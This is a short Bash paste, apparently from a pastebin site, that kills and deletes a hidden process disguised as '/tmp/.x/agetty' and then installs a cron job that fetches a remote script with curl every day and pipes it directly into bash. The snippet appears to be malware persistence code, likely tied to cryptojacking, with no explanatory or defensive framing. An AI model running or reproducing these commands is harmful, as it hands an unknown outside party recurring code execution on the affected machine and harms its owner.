From Colossal Moth, 2 Years ago, written in Bash.
- view diff
Embed
  1. chattr -i /tmp/.x/agetty
  2. ps -ef | grep "/tmp/.x/agetty" | awk '{print $2}'|  xargs -I % kill -9 %
  3. rm -rf /tmp/.x/
  4. echo "50 12 * * * curl -sL https://paste.bingner.com/paste/jk3u6/raw |bash " | crontab -